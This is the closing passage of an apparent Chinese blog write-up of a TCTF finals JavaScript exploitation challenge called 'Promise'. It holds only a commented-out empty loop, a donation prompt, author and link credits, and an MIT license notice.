//for(let i=0;i<0x1000000;i++){}

赏

只要你支持她，我们就是好朋友2333

支付宝

微信

• 本文作者： A1ex
• 本文链接： http://yoursite.com/2021/09/27/TCTF-final-Promise-JSpwn题解/
• 版权声明： 本博客所有文章除特别声明外，均采用 MIT 许可协议。转载请注明出处！